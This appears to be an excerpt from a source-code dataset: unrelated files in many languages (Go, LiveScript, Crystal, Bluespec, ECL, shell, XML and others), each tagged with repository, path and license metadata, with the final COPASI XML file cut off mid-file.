#tag Constant, Name = kSubmitResultFailed, Type = Double, Dynamic = False, Default = \"4", Scope = Public
#tag EndConstant
#tag Constant, Name = kSubmitResultQueued, Type = Double, Dynamic = False, Default = \"1", Scope = Public
#tag EndConstant
#tag Constant, Name = kSubmitResultReportCancelled, Type = Double, Dynamic = False, Default = \"6", Scope = Public
#tag EndConstant
#tag Constant, Name = kSubmitResultUploaded, Type = Double, Dynamic = False, Default = \"2", Scope = Public
#tag EndConstant
#tag Constant, Name = kSubmitResultWERDisabled, Type = Double, Dynamic = False, Default = \"5", Scope = Public
#tag EndConstant
#tag ViewBehavior
#tag ViewProperty
Name="AdditionalDataHeader"
Group="Behavior"
Type="String"
EditorType="MultiLineEditor"
#tag EndViewProperty
#tag ViewProperty
Name="CloseBody"
Group="Behavior"
Type="String"
EditorType="MultiLineEditor"
#tag EndViewProperty
#tag ViewProperty
Name="CloseButtonCaption"
Group="Behavior"
Type="String"
EditorType="MultiLineEditor"
#tag EndViewProperty
#tag ViewProperty
Name="CloseHeader"
Group="Behavior"
Type="String"
EditorType="MultiLineEditor"
#tag EndViewProperty
#tag ViewProperty
Name="CloseText"
Group="Behavior"
Type="String"
EditorType="MultiLineEditor"
#tag EndViewProperty
#tag ViewProperty
Name="ConsentBody"
Group="Behavior"
Type="String"
EditorType="MultiLineEditor"
#tag EndViewProperty
#tag ViewProperty
Name="ConsentHeader"
Group="Behavior"
Type="String"
EditorType="MultiLineEditor"
#tag EndViewProperty
#tag ViewProperty
Name="Index"
Visible=true
Group="ID"
InitialValue="-2147483648"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Left"
Visible=true
Group="Position"
InitialValue="0"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Name"
Visible=true
Group="ID"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="OfflineSolutionCheckText"
Group="Behavior"
Type="String"
EditorType="MultiLineEditor"
#tag EndViewProperty
#tag ViewProperty
Name="OnlineSolutionCheckText"
Group="Behavior"
Type="String"
EditorType="MultiLineEditor"
#tag EndViewProperty
#tag ViewProperty
Name="Super"
Visible=true
Group="ID"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Top"
Visible=true
Group="Position"
InitialValue="0"
InheritedFrom="Object"
#tag EndViewProperty
#tag EndViewBehavior
End Class
#tag EndClass
| REALbasic | 5 | bskrtich/WFS | Windows Functionality Suite/Miscellaneous/Classes/ErrorReportWFS.rbbas | [
"MIT"
] |
module TrackedProviders;
export {
redef record Conn::Info += {
found_tracked_provider: bool &log &default=F;
};
}
event connection_state_remove (c: connection)
{
if ( c?$provider )
c$conn$found_tracked_provider = T;
}
| Bro | 4 | LaudateCorpus1/cs-bro | bro-scripts/tracked-providers/add-provider.bro | [
"BSD-2-Clause"
] |
// 功能:SPI写控制器的 testbench
// 目的:演示多文件(多包)项目的组织方式
package TbSPIWriter; // 包名 TbSPIWriter ,必须与文件名相同
import StmtFSM::*; // 引入 BSV 标准库 StmtFSM
import SPIWriter::*; // 引入用户编写的包 SPIWriter (见文件SPIWriter.bsv)
module mkTb ();
let spi_writer <- mkSPIWriter;
mkAutoFSM(
seq
spi_writer.write(8'h65); // SPI 发送 0x65
spi_writer.write(8'h14); // SPI 发送 0x14
spi_writer.write(8'h00);
endseq
);
rule spi_show; // 每个时钟周期都打印 spi_writer 产生的 SPI 信号
let spi = spi_writer.spi;
$display(" (ss, sck, mosi) = (%1d, %1d, %1d)", spi[2], spi[1], spi[0] );
endrule
endmodule
endpackage
| Bluespec | 5 | Xiefengshang/BSV_Tutorial_cn | src/3.SPIWriter/TbSPIWriter.bsv | [
"MIT"
] |
// Copyright (c) 2019 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package edwards25519
import (
"testing"
"testing/quick"
)
func TestScalarAliasing(t *testing.T) {
checkAliasingOneArg := func(f func(v, x *Scalar) *Scalar, v, x Scalar) bool {
x1, v1 := x, x
// Calculate a reference f(x) without aliasing.
if out := f(&v, &x); out != &v || !isReduced(out) {
return false
}
// Test aliasing the argument and the receiver.
if out := f(&v1, &v1); out != &v1 || v1 != v || !isReduced(out) {
return false
}
// Ensure the arguments was not modified.
return x == x1
}
checkAliasingTwoArgs := func(f func(v, x, y *Scalar) *Scalar, v, x, y Scalar) bool {
x1, y1, v1 := x, y, Scalar{}
// Calculate a reference f(x, y) without aliasing.
if out := f(&v, &x, &y); out != &v || !isReduced(out) {
return false
}
// Test aliasing the first argument and the receiver.
v1 = x
if out := f(&v1, &v1, &y); out != &v1 || v1 != v || !isReduced(out) {
return false
}
// Test aliasing the second argument and the receiver.
v1 = y
if out := f(&v1, &x, &v1); out != &v1 || v1 != v || !isReduced(out) {
return false
}
// Calculate a reference f(x, x) without aliasing.
if out := f(&v, &x, &x); out != &v || !isReduced(out) {
return false
}
// Test aliasing the first argument and the receiver.
v1 = x
if out := f(&v1, &v1, &x); out != &v1 || v1 != v || !isReduced(out) {
return false
}
// Test aliasing the second argument and the receiver.
v1 = x
if out := f(&v1, &x, &v1); out != &v1 || v1 != v || !isReduced(out) {
return false
}
// Test aliasing both arguments and the receiver.
v1 = x
if out := f(&v1, &v1, &v1); out != &v1 || v1 != v || !isReduced(out) {
return false
}
// Ensure the arguments were not modified.
return x == x1 && y == y1
}
for name, f := range map[string]interface{}{
"Negate": func(v, x Scalar) bool {
return checkAliasingOneArg((*Scalar).Negate, v, x)
},
"Multiply": func(v, x, y Scalar) bool {
return checkAliasingTwoArgs((*Scalar).Multiply, v, x, y)
},
"Add": func(v, x, y Scalar) bool {
return checkAliasingTwoArgs((*Scalar).Add, v, x, y)
},
"Subtract": func(v, x, y Scalar) bool {
return checkAliasingTwoArgs((*Scalar).Subtract, v, x, y)
},
} {
err := quick.Check(f, &quick.Config{MaxCountScale: 1 << 5})
if err != nil {
t.Errorf("%v: %v", name, err)
}
}
}
| Go | 5 | SSSDNSY/go | src/crypto/ed25519/internal/edwards25519/scalar_alias_test.go | [
"BSD-3-Clause"
] |
-- ConjunctionMlt.gf: co-ordination
--
-- Maltese GF Resource Grammar
-- John J. Camilleri 2011 -- 2013
-- Licensed under LGPL
concrete ConjunctionMlt of Conjunction =
CatMlt ** open ResMlt, Coordination, Prelude in {
lin
-- Conj -> [S] -> S -- "he walks and she runs"
ConjS = conjunctDistrSS ;
-- Conj -> [Adv] -> Adv -- "here or there"
ConjAdv c l = conjunctDistrSS c l ** {
joinsVerb = False ;
a = agrP3 Sg Masc ; -- ignored when joinsVerb = False
} ;
-- Conj -> [AdV] -> AdV
ConjAdV c l = conjunctDistrSS c l ** {
joinsVerb = False ;
a = agrP3 Sg Masc ;
} ;
-- Conj -> [IAdv] -> IAdv -- "where and with whom"
ConjIAdv = conjunctDistrSS ;
-- Conj -> [NP] -> NP -- "either her or me"
ConjNP conj ss = {
s = \\npcase => conj.s1 ++ ss.np1.s ! npcase ++ conj.s2 ++ ss.np2.s ! npcase ;
a = { p = ss.np2.a.p ; g = ss.np2.a.g ; n = Pl } ; -- make plural
isPron = andB ss.np1.isPron ss.np2.isPron ;
isDefn = andB ss.np1.isDefn ss.np2.isDefn ;
} ;
-- Conj -> [AP] -> AP -- "cold and warm"
ConjAP conj ss = conjunctDistrTable GenNum conj ss ** {
isPre = ss.isPre
} ;
-- Conj -> [RS] -> RS -- "who walks and whose mother runs"
ConjRS conj ss = conjunctDistrTable Agr conj ss ** {
c = ss.c
} ;
-- Conj -> [CN] -> CN -- "man and woman"
ConjCN conj ss = {
s = \\num => conj.s1 ++ ss.n1.s ! num ++ conj.s2 ++ ss.n2.s ! num ;
g = conjGender ss.n1.g ss.n2.g ;
hasColl = False ;
hasDual = False ;
takesPron = False ;
} ;
-- These fun's are generated from the list cat's.
BaseS = twoSS ;
ConsS = consrSS comma ;
BaseAdv = twoSS ;
ConsAdv = consrSS comma ;
BaseAdV = twoSS ;
ConsAdV = consrSS comma ;
BaseIAdv = twoSS ;
ConsIAdv = consrSS comma ;
BaseNP x y = { np1 = x ; np2 = y } ;
ConsNP xs x = {
np1 = {
s = \\npcase => x.np1.s ! npcase ++ comma ++ x.np2.s ! npcase ;
a = conjAgr x.np1.a x.np2.a ;
isPron = andB x.np1.isPron x.np2.isPron ;
isDefn = andB x.np1.isDefn x.np2.isDefn ;
} ;
np2 = xs ;
} ;
BaseAP x y = twoTable GenNum x y ** {isPre = andB x.isPre y.isPre} ;
ConsAP xs x = consrTable GenNum comma xs x ** {isPre = andB xs.isPre x.isPre} ;
BaseRS x y = twoTable Agr x y ** {c = y.c} ;
ConsRS xs x = consrTable Agr comma xs x ** {c = xs.c} ;
BaseCN x y = { n1 = x ; n2 = y } ;
ConsCN xs x = {
n1 = {
s = \\num => x.n1.s ! num ++ comma ++ x.n2.s ! num ;
g = x.n2.g ;
hasColl = False ;
hasDual = False ;
takesPron = False ;
} ;
n2 = xs ;
} ;
lincat
-- These basically match the lincat's in CommonX/CatMlt
[S] = {s1,s2 : Str} ;
[Adv] = {s1,s2 : Str} ;
[AdV] = {s1,s2 : Str} ;
[IAdv] = {s1,s2 : Str} ;
[NP] = {np1,np2 : NounPhrase} ;
[AP] = {s1,s2 : GenNum => Str ; isPre : Bool} ;
[RS] = {s1,s2 : Agr => Str} ;
[CN] = {n1,n2 : Noun} ;
}
| Grammatical Framework | 5 | daherb/gf-rgl | src/maltese/ConjunctionMlt.gf | [
"BSD-3-Clause"
] |
#include "caffe2/core/context_gpu.h"
#include "caffe2/operators/stop_gradient.h"
namespace caffe2 {
REGISTER_CUDA_OPERATOR(StopGradient, StopGradientOp<CUDAContext>);
} // namespace caffe2
| C++ | 3 | Hacky-DH/pytorch | caffe2/operators/stop_gradient_gpu.cc | [
"Intel"
] |
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/bin/bash
g_type=grid
ordering=BFS
blksize=-1
bsize=80
data_dir=../../../../data/$g_type-$ordering
save_dir=../../../../results/$g_type/$ordering-blksize-$blksize-b-$bsize
if [ ! -e $save_dir ];
then
mkdir -p $save_dir
fi
export CUDA_VISIBLE_DEVICES=3
python ../batch_train.py \
-data_dir $data_dir \
-pos_enc True \
-tree_pos_enc False \
-share_param True \
-save_dir $save_dir \
-g_type $g_type \
-node_order $ordering \
-num_graphs $num_g \
-blksize $blksize \
-epoch_save 100 \
-bits_compress 256 \
-batch_size $bsize \
-num_test_gen 20 \
-num_epochs 1000 \
-gpu 0 \
$@
| Shell | 4 | deepneuralmachine/google-research | bigg/bigg/experiments/synthetic/scripts/run_grid.sh | [
"Apache-2.0"
] |
require! \fs
$ = require \jquery-browserify
{compile} = require \livescript/lib
{concat-map, drop, filter, find, fold, group-by, id, keys, last, map, Obj, obj-to-pairs, pairs-to-obj,
reject, reverse, Str, sort-by, take, unique, unique-by, values, zip-with} = require \prelude-ls
{partition-string} = require \prelude-extension
{create-factory}:React = require \react
{a, button, div, form, h1, h2, img, input, li, ol, option, span, ul} = require \react-dom-factories
{find-DOM-node, render} = require \react-dom
require! \react-router
Link = create-factory react-router.Link
Route = create-factory react-router.Route
Router = create-factory react-router.Router
hash-history = require \react-router/lib/HashHistory
require! \react-tools
Example = create-factory require \./Example.ls
{HighlightedText, SimpleSelect, MultiSelect, ReactSelectize} = require \index.ls
_ = require \underscore
create-react-class = require \create-react-class
examples =
multi:
* title: "Multi select"
description: ""
languages:
jsx: fs.read-file-sync \public/examples/multi/MultiSelect.jsx, \utf8
ls: fs.read-file-sync \public/examples/multi/MultiSelect.ls, \utf8
* title: "On values change"
description: ""
languages:
jsx: fs.read-file-sync \public/examples/multi/ChangeCallback.jsx, \utf8
ls: fs.read-file-sync \public/examples/multi/ChangeCallback.ls, \utf8
* title: "Animated dropdown"
description: ""
languages:
jsx: fs.read-file-sync \public/examples/multi/Animation.jsx, \utf8
ls: fs.read-file-sync \public/examples/multi/Animation.ls, \utf8
* title: "Max values"
description: """
This example only allows 2 items.
Select one more item and the control will be disabled until one or more are deleted.
"""
languages:
jsx: fs.read-file-sync \public/examples/multi/MaxValues.jsx, \utf8
ls: fs.read-file-sync \public/examples/multi/MaxValues.ls, \utf8
* title: "Tags"
description: """
Add and remove items in any order without touching your mouse.
Use your left/right arrow keys to move the cursor between items.
"""
languages:
jsx: fs.read-file-sync \public/examples/multi/TagsBasic.jsx, \utf8
ls: fs.read-file-sync \public/examples/multi/TagsBasic.ls, \utf8
* title: "Tags - Advance usage"
description: """
default values, comma to confirm selection, custom error messages (like "Tag already exists")
convert pasted text into tags, edit existing tags by pressing [backspace]
"""
languages:
jsx: fs.read-file-sync \public/examples/multi/Tags.jsx, \utf8
ls: fs.read-file-sync \public/examples/multi/Tags.ls, \utf8
* title: "Option groups"
description: """
Display option groups as columns by setting groupsAsColumns property to true
"""
languages:
jsx: fs.read-file-sync \public/examples/multi/OptionGroups.jsx, \utf8
ls: fs.read-file-sync \public/examples/multi/OptionGroups.ls, \utf8
* title: "Dropdown direction"
description: """
The following example flips the dropdown based on the screen Y value of the select component.
open the dropdown and scroll up and down past the select component
"""
languages:
jsx: fs.read-file-sync \public/examples/multi/DropdownDirection.jsx, \utf8
ls: fs.read-file-sync \public/examples/multi/DropdownDirection.ls, \utf8
* title: "Cursor"
description: """
To control the position of the cursor use the anchor & onAnchorChange props.
The cursor is placed ahead of the anchor item.
To position the cursor at the start, set anchor to undefined
"""
languages:
jsx: fs.read-file-sync \public/examples/multi/Cursor.jsx, \utf8
ls: fs.read-file-sync \public/examples/multi/Cursor.ls, \utf8
* title: "Disable selected"
description: ""
languages:
jsx: fs.read-file-sync \public/examples/multi/DisableSelected.jsx, \utf8
ls: fs.read-file-sync \public/examples/multi/DisableSelected.ls, \utf8
* title: "Custom filtering and rendering"
description: """
This demonstrates two main things:
(1) custom item and option rendering, and
(2) custom item filtering, for example, try typing :) or <3
"""
languages:
jsx: fs.read-file-sync \public/examples/multi/CustomRendering.jsx, \utf8
ls: fs.read-file-sync \public/examples/multi/CustomRendering.ls, \utf8
* title: "Tether"
description: """
Setting props.tether to true makes the dropdown an absolutely positioned overlay and uses HubSpot's Tether
to keep the dropdown tethered to the input control when you scroll the parent element.
This can be useful when you are using the select control inside a parent element with its overflow auto or scroll.
"""
languages:
jsx: fs.read-file-sync \public/examples/multi/Tether.jsx, \utf8
ls: fs.read-file-sync \public/examples/multi/Tether.ls, \utf8
...
simple:
* title: "Simple select"
description: ""
languages:
jsx: fs.read-file-sync \public/examples/simple/SimpleSelect.jsx, \utf8
ls: fs.read-file-sync \public/examples/simple/SimpleSelect.ls, \utf8
* title: "Themes"
description: ""
languages:
jsx: fs.read-file-sync \public/examples/simple/Themes.jsx, \utf8
ls: fs.read-file-sync \public/examples/simple/Themes.ls, \utf8
* title: "On value change"
description: ""
languages:
jsx: fs.read-file-sync \public/examples/simple/ChangeCallback.jsx, \utf8
ls: fs.read-file-sync \public/examples/simple/ChangeCallback.ls, \utf8
* title: "Restore on backspace"
description: """
Press the [backspace] key and go back to editing the item without it being fully removed.
"""
languages:
jsx: fs.read-file-sync \public/examples/simple/RestoreOnBackspace.jsx, \utf8
ls: fs.read-file-sync \public/examples/simple/RestoreOnBackspace.ls, \utf8
* title: "Editable value"
description: """
Edit or select all & copy text of the selected value, after selecting it (similar to an AutoComplete component)
"""
languages:
jsx: fs.read-file-sync \public/examples/simple/Editable.jsx, \utf8
ls: fs.read-file-sync \public/examples/simple/Editable.ls, \utf8
* title: "Create from search"
description: """
Create item from search text
"""
languages:
jsx: fs.read-file-sync \public/examples/simple/CreateFromSearch.jsx, \utf8
ls: fs.read-file-sync \public/examples/simple/CreateFromSearch.ls, \utf8
* title: "Drop in replacement for React.DOM.Select"
description: ""
languages:
jsx: fs.read-file-sync \public/examples/simple/Children.jsx, \utf8
ls: fs.read-file-sync \public/examples/simple/Children.ls, \utf8
* title: "Event listeners"
description: """
A demonstration showing how to use the API to cascade controls for a classic make / model selector
"""
languages:
jsx: fs.read-file-sync \public/examples/simple/EventListeners.jsx, \utf8
ls: fs.read-file-sync \public/examples/simple/EventListeners.ls, \utf8
* title: "Search highlighting"
description: ""
languages:
jsx: fs.read-file-sync \public/examples/simple/SearchHighlighting.jsx, \utf8
ls: fs.read-file-sync \public/examples/simple/SearchHighlighting.ls, \utf8
* title: "Custom option and value rendering"
description: ""
languages:
jsx: fs.read-file-sync \public/examples/simple/CustomRendering.jsx, \utf8
ls: fs.read-file-sync \public/examples/simple/CustomRendering.ls, \utf8
* title: "Selectability"
description: """
Freeze options using the selectable property
"""
languages:
jsx: fs.read-file-sync \public/examples/simple/Selectability.jsx, \utf8
ls: fs.read-file-sync \public/examples/simple/Selectability.ls, \utf8
* title: "Remote options"
description: """
This demo shows how to integrate third-party data from cdn.js
"""
languages:
jsx: fs.read-file-sync \public/examples/simple/RemoteOptions.jsx, \utf8
ls: fs.read-file-sync \public/examples/simple/RemoteOptions.ls, \utf8
...
App = create-react-class do
display-name: \App
# get-default-props :: a -> Props
get-default-props: ->
query:
category: \multi
# example :: String
# render :: a -> ReactElement
render: ->
selected-category = @props.location.query?.category ? \multi
# APP
div class-name: \app,
# CATEGORIES
div class-name: \categories,
div class-name: \line
<[multi simple]> |> map (category) ~>
Link do
key: category
class-name: if category == selected-category then \selected else ''
to: "?category=#{category}"
category
div class-name: \line
# EXAMPLES
div class-name: \examples,
examples[selected-category] |> map ({title, description, {jsx, ls}:languages}) ~>
key = "#{title.to-lower-case!.replace /\s+/g, '-'}"
Example do
key: key
ref: key
title: title
description: description
width: 850
style:
margin-bottom: 100
initial-language: \livescript
languages:
* id: \livescript
name: \Livescript
initial-content: ls
on-execute: (content, mount-node) ->
eval compile content, {bare: true}
* id: \jsx
name: \JSX
initial-content: jsx
on-execute: (content, mount-node) -> eval react-tools.transform content
* id: \javascript
name: \JS
initial-content: react-tools.transform jsx
on-execute: (content, mount-node) -> eval content
# scroll-to-example :: a -> Void
scroll-to-example: !->
example-element = find-DOM-node @refs?[@props.location.query.example]
if !!example-element
<~ set-timeout _, 150
example-element.scroll-into-view!
# external links
# component-did-mount :: a -> Void
component-did-mount: !-> @scroll-to-example!
# changing the query string manually, or clicking on a different example
# component-did-update :: Props -> Void
component-did-update: (prev-props) !-> @scroll-to-example!
render do
Router do
history: hash-history # query-key: false
Route path: \/, component: App
document.get-element-by-id \mount-node | LiveScript | 5 | santiagoGuti/react-selectize | public/components/App.ls | [
"Apache-2.0"
] |
{layout '@layout.latte'}
{block title}{$title ?: 'Overview'}{/block}
{block content}
<h1>{include title}</h1>
{if count($allNamespaces)}
<table class="table table-responsive table-bordered table-striped" id="namespaces">
<tr><th>Namespaces Summary</th></tr>
<tr n:foreach="$allNamespaces as $namespace">
<td>
<a href="{$namespace|linkNamespace}">{$namespace}</a>
</td>
</tr>
</table>
{/if}
{if count($allNamespaces) <= 1}
{include '@elementlist.latte',
"classes" => $allClasses,
"exceptions" => $allExceptions,
"interfaces" => $allInterfaces,
"traits" => $allTraits,
"functions" => $allFunctions
}
{/if}
{/block}
| Latte | 4 | pujak17/tets | packages/ThemeDefault/src/index.latte | [
"MIT"
] |
class(x : 'i32) { this }
a: list!heap class()
for x : 1 to 100000 {
a.add(item : heap class(x))
}
c : a[0]
c.x | Objective-J | 2 | justinmann/sj | tests/list1.sj | [
"Apache-2.0"
] |
{
"FAILOVER": {
"summary": "Start a coordinated failover between this server and one of its replicas.",
"complexity": "O(1)",
"group": "server",
"since": "6.2.0",
"arity": -1,
"function": "failoverCommand",
"command_flags": [
"ADMIN",
"NOSCRIPT",
"STALE"
],
"arguments": [
{
"name": "target",
"token": "TO",
"type": "block",
"optional": true,
"arguments": [
{
"name": "host",
"type": "string"
},
{
"name": "port",
"type": "integer"
},
{
"token": "FORCE",
"name": "force",
"type": "pure-token",
"optional": true
}
]
},
{
"token": "ABORT",
"name": "abort",
"type": "pure-token",
"optional": true
},
{
"token": "TIMEOUT",
"name": "milliseconds",
"type": "integer",
"optional": true
}
]
}
}
| JSON | 4 | hpdic/redis | src/commands/failover.json | [
"BSD-3-Clause"
] |
class LLVM::MemoryBuffer
def self.from_file(filename : String)
ret = LibLLVM.create_memory_buffer_with_contents_of_file(filename, out mem_buf, out msg)
if ret != 0 && msg
raise LLVM.string_and_dispose(msg)
end
new(mem_buf)
end
def initialize(@unwrap : LibLLVM::MemoryBufferRef)
@finalized = false
end
def to_slice
Slice.new(
LibLLVM.get_buffer_start(@unwrap),
LibLLVM.get_buffer_size(@unwrap),
)
end
def dispose
return if @finalized
@finalized = true
finalize
end
def finalize
return if @finalized
LibLLVM.dispose_memory_buffer(@unwrap)
end
def to_unsafe
@unwrap
end
end
| Crystal | 4 | n00p3/crystal | src/llvm/memory_buffer.cr | [
"Apache-2.0"
] |
/*##############################################################################
HPCC SYSTEMS software Copyright (C) 2012 HPCC Systems®.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
############################################################################## */
#option ('globalFold', false);
d := dataset('~local::gch::person', { string15 name, unsigned8 filepos{virtual(fileposition)} }, flat);
i := index(d,,'~local::gch::person.key');
isAll := true : stored('isAll');
filterSet := IF(isAll, ALL, []);
output(i(name in filterSet));
output(join(d, i, KEYED(RIGHT.name IN IF(LEFT.name = 'gavin', ALL, [])))); | ECL | 4 | miguelvazq/HPCC-Platform | ecl/regress/indexreadset.ecl | [
"Apache-2.0"
] |
package {
import GZ.Gpu.ShaderBase.FragmentShader;
import GZ.Gpu.ShaderBase.VertexShader;
import GZ.Gpu.ShaderBase.ProgramShader;
import GZ.Gpu.Base.Attribute;
import GZ.Gpu.Base.Texture;
import GZ.Gpu.Base.Uniform;
import GZ.Gpu.Base.UnVec2;
import GZ.Gpu.Base.UnVec4;
import GZ.Gpu.Base.UnFloat;
import GZ.Gpu.Base.UnInt;
import GZ.Gpu.Base.Texture;
import GZ.Gpu.ShaderBase.Vbo;
import GZ.Gpu.GpuObj.GpuBatch;
import GZ.Base.Perspective;
import GZ.Sys.Interface.Context;
import GZ.Gpu.ShaderModel.GzModel.GzShModel;
import GZ.Gpu.ShaderModel.AtModel.Attribute_Quad;
import GZ.Gpu.ShaderModel.GzModel.GzShModel_Quad.GzShModel_Quad_Vertex;
import GZ.Gpu.ShaderModel.GzModel.GzShCommun.GzShCommun_Light;
//import GZ.Base.TestPod;
//import GZ.Base.TestPod2;
public class GzShModel_Quad extends GzShModel_Quad_Vertex {
public var oAt : Attribute_Quad;
public var nTest : Int = 0;
public var oVbo : Vbo;
public function GzShModel_Quad():Void {
Debug.fTrace("--- GzShModel Created!! ---");
}
override public function fIni_Base():Void {
oVbo = new Vbo(oProgram);
oAt = new Attribute_Quad(oVbo);
Attribute_Quad = oAt; //Singleton
}
.
override public function fLoad_Base():Void {
Debug.fPass("Load Shader GzModel_Quad");
//oVertex.fLoad();
//oFragement.fLoad();
////////////// TODO Create Vertext ID since ES2/WebGl_1.0 not support gl_VertexID //////////////
oProgram.fSetDefaultAttribDivisor(1);
oVboBatch = oProgram.fAddVbo();
oGpuBatch = new GpuBatch(this);
var _oAtVertexID : Attribute = new Attribute("atVertexID", oVboBatch, 0);//TODO null!
oAt.fLocateAttribute(oProgram);
oUiTime = new UnFloat(oProgram, "iTime");
oUiMouse = new UnVec2(oProgram, "iMouse");
oUiResolution = new UnVec2(oProgram, "iResolution");
oUnType = new UnInt(oProgram, "nType");
oUvPersp = new UnVec4(oProgram, "vPersp");
GzShCommun_Light.fIniData(oProgram);
}
override public function fIniRender():Void {
//Debug.fTrace("fIniData -- Total Face : " + Context.oItf.nTotalFaces) ;
oVbo.fIniData(Context.oItf.nTotalFaces, 4, 13);
oAt.fIniData( );
}
override public function fUpdate():Void {
oVbo.fSendData();
oVboBatch.fSetDefaultDataVertexID();
oVboBatch.fSendData();
oUiMouse.vVal.nX = Context.nMouseX/Context.nFrameWidth - 0.5;
oUiMouse.vVal.nY = Context.nMouseY/Context.nFrameHeight - 0.5;
oUiMouse.fSend();
oUiResolution.vVal.nX = Context.nFrameWidth;
oUiResolution.vVal.nY = Context.nFrameHeight;
oUiResolution.fSend();
//Default Perspective
//TODO get perspective from current buffer!
oUvPersp.vVal.nX = Context.oItf.oPerspective.nFromX;//nFromX
oUvPersp.vVal.nY = Context.oItf.oPerspective.nFromY;//nFromY
oUvPersp.vVal.nZ = Context.oItf.oPerspective.nFromZ;//nValue
oUvPersp.vVal.nW = Context.oItf.oPerspective.nType; //nType
oUvPersp.fSend();
GzShCommun_Light.fSetEyePos();
GzShCommun_Light.fSetAmbiant();
GzShCommun_Light.fSendLight();
//oGpuBatch.fSetDestination(null); For test
oGpuBatch.fDraw();
// for(var i : Int = 0; i < 50; i++){
if(oGpuBatch.oFBO_Destination != null){ //We must render on screen now
oGpuBatch.oFBO_Destination.fToDefaultFrameBuffer();
}
//}
}
}
} | Redcode | 3 | VLiance/GZE | src/Lib_GZ/Gpu/ShaderModel/GzModel/GzShModel_Quad/GzShModel_Quad.cw | [
"Apache-2.0"
] |
HEADERS += \
$$PWD/filehandler.h
SOURCES += \
$$PWD/filehandler.cpp
| QMake | 1 | jiadxin/QtScrcpy | QtScrcpy/device/filehandler/filehandler.pri | [
"Apache-2.0"
] |
# Disable busy waiting, so that we don't waste
# resources when running in the cloud
+sbwt none +sbwtdcpu none +sbwtdio none
| HTML+EEX | 1 | kianmeng/livebook | rel/vm.args.eex | [
"Apache-2.0"
] |
POST /stuff/here?foo=bar HTTP/1.0\r\n
CONTENT-LENGTH: bla-bla-bla\r\n
\r\n
{"test": "-1} | HTTP | 0 | ashishmjn/gunicorn | tests/requests/invalid/015.http | [
"MIT"
] |
<?xml version="1.0" encoding="UTF-8"?>
<!-- generated with COPASI 4.29 (Build 228) (http://www.copasi.org) at 2021-01-04T13:52:49Z -->
<?oxygen RNGSchema="http://www.copasi.org/static/schema/CopasiML.rng" type="xml"?>
<COPASI xmlns="http://www.copasi.org/static/schema" versionMajor="4" versionMinor="29" versionDevel="228" copasiSourcesModified="0">
<ListOfFunctions>
<Function key="Function_6" name="Constant flux (irreversible)" type="PreDefined" reversible="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Function_6">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2020-12-29T20:07:15Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
v
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_49" name="v" order="0" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_13" name="Mass action (irreversible)" type="MassAction" reversible="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Function_13">
<CopasiMT:is rdf:resource="urn:miriam:obo.sbo:SBO:0000163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Comment>
<body xmlns="http://www.w3.org/1999/xhtml">
<b>Mass action rate law for irreversible reactions</b>
<p>
Reaction scheme where the products are created from the reactants and the change of a product quantity is proportional to the product of reactant activities. The reaction scheme does not include any reverse process that creates the reactants from the products. The change of a product quantity is proportional to the quantity of one reactant.
</p>
</body>
</Comment>
<Expression>
k1*PRODUCT<substrate_i>
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_80" name="k1" order="0" role="constant"/>
<ParameterDescription key="FunctionParameter_81" name="substrate" order="1" role="substrate"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_14" name="Mass action (reversible)" type="MassAction" reversible="true">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Function_14">
<CopasiMT:is rdf:resource="urn:miriam:obo.sbo:SBO:0000042" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Comment>
<body xmlns="http://www.w3.org/1999/xhtml">
<b>Mass action rate law for reversible reactions</b>
<p>
Reaction scheme where the products are created from the reactants and the change of a product quantity is proportional to the product of reactant activities. The reaction scheme does include a reverse process that creates the reactants from the products.
</p>
</body>
</Comment>
<Expression>
k1*PRODUCT<substrate_i>-k2*PRODUCT<product_j>
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_69" name="k1" order="0" role="constant"/>
<ParameterDescription key="FunctionParameter_68" name="substrate" order="1" role="substrate"/>
<ParameterDescription key="FunctionParameter_78" name="k2" order="2" role="constant"/>
<ParameterDescription key="FunctionParameter_79" name="product" order="3" role="product"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_40" name="Function for ADK" type="UserDefined" reversible="true">
<MiriamAnnotation>
